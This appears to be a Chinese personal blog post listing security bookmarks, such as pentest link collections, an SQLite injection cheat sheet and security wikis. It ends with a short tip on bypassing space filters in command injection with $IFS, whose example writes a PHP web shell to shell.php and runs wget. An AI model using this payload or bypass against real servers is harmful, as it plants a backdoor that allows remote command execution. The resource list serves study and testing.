累绝不爱的在线知识库--BookMarks

        很久没有更新博客了,最近一直折腾离职的事情,转了一大圈还是没有离职而去,我想说公司领导层真够折腾人的,最近真是身心疲惫。

        今日就先更一个,稍后待补,太多了。

        http://www.proactiverisk.com/home/proactivetools  checklist cheat-sheet paper tools audit

        http://www.windowsecurity.com/whitepapers/    Papers

        https://labs.mwrinfosecurity.com/publications/    WP8 Security Report

        http://www.nothink.org/misc/snmp_reflected.php      SNMP Reflected Amplification DDoS Attack

        http://www.nothink.org/misc/android.php    Android Misc   

        http://www.nothink.org/sandbox_and_utilities.php    So...so..

        https://prism-break.org    keke......instead of all

        http://www.aldeid.com/  security wiki

        http://onlinedisassembler.com/odaweb/  Online DisAssembler

        https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet  SQLite Injection Cheatsheet 

        http://corelabs.coresecurity.com/index.php?module=Wiki&action=list&type=publication

        https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList    pentest-bookmarks

        http://yehg.net/lab/pr0js/misc/wsa.php Online Tools

        http://archive.liquidmatrix.org    Global Security Conference video

        http://www.blackarch.org/tools.html  Many Security tools

        http://blog.idf.cn/%E8%B5%84%E6%BA%90%E6%8E%A8%E8%8D%90/ security article recommend

        http://technet.microsoft.com/en-us/security/cc308575#0414     Researcher's blog

        http://data.ceh.vn/Ebook/ebooks.shahed.biz/HACK/  hack、develop、design book

        https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines WebAppSec/Secure Coding Guidelines

        http://www.linuxtopia.org/  On-line Linux and Open Source Technology Books and How To Guides


Tips:(2015.8.16更)

    不允许使用空格的php代码执行绕过:(使用$IFS代替空格或tab)

        echo$IFS”<?=system(\$_GET[x]);?>”>shell.php
        If you wanted to wget something: wget$IFS”https://google.com/robots.txt”



你可能感兴趣的:(secure,tools,coding,bookmarks,papers)